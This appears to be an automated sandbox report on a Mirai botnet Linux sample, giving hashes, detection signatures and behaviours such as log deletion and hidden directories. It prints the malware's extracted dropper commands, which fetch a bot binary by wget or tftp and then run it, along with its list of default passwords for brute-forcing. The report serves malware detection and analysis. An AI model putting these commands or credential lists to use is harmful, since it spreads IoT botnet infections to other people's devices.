Linux Analysis Report
na.elf

Overview

General Information

Sample name: na.elf
Analysis ID: 1530590
MD5: 9fbcbec2482f6966fb801bd429348f97
SHA1: e271c718461839d42a935b2f026ac3e6f06c407e
SHA256: 9d6ec4ee1096ec4c6d4e43d4ce4c28423a03cc327a0fcaf8b39b28553ae38e00
Tags: elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: na.elf ReversingLabs: Detection: 28%
Found strings indicative of a multi-platform dropper
Source: na.elf String: ash|login|wget|curl|tftp|ntpdate
Source: na.elf String: N^Nu/proc/|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//proc/net/tcp/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
Sample listens on a socket
Source: /tmp/na.elf (PID: 5447) Socket: 127.0.0.1:1234 Jump to behavior
Source: na.elf String found in binary or memory: http://%d.%d.%d.%d/la.bot.%s
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
Source: Initial sample String containing 'busybox' found: /bin/busybox BOT
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample String containing 'busybox' found: N^Nu/proc/|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//proc/net/tcp/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
Source: Initial sample String containing 'busybox' found: /bin/busybox BOTbuf = %s
Source: Initial sample String containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>retrieve/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: 12345678
Source: Initial sample String containing potential weak password found: 654321
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: administrator
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal64.troj.evad.linELF@0/0@0/0

Data Obfuscation
barindex
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Source: /tmp/na.elf (PID: 5451) File: /etc/config Jump to behavior
Creates hidden files and/or directories
Source: /tmp/na.elf (PID: 5451) Directory: /root/.cache Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /root/.ssh Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /root/.config Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /root/.local Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/na.elf (PID: 5451) Directory: /etc/.java Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes system log files
Source: /tmp/na.elf (PID: 5451) Log files deleted: /var/log/kern.log Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/na.elf (PID: 5447) Queries kernel information via 'uname': Jump to behavior
Source: na.elf, 5447.1.00007ffc31998000.00007ffc319b9000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 5447.1.00007ffc31998000.00007ffc319b9000.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k
Source: na.elf, 5447.1.0000561c1427c000.0000561c14301000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k
Source: na.elf, 5447.1.0000561c1427c000.0000561c14301000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/m68k

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: na.elf, type: SAMPLE

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: na.elf, type: SAMPLE

No Screenshots

No contacted IP infos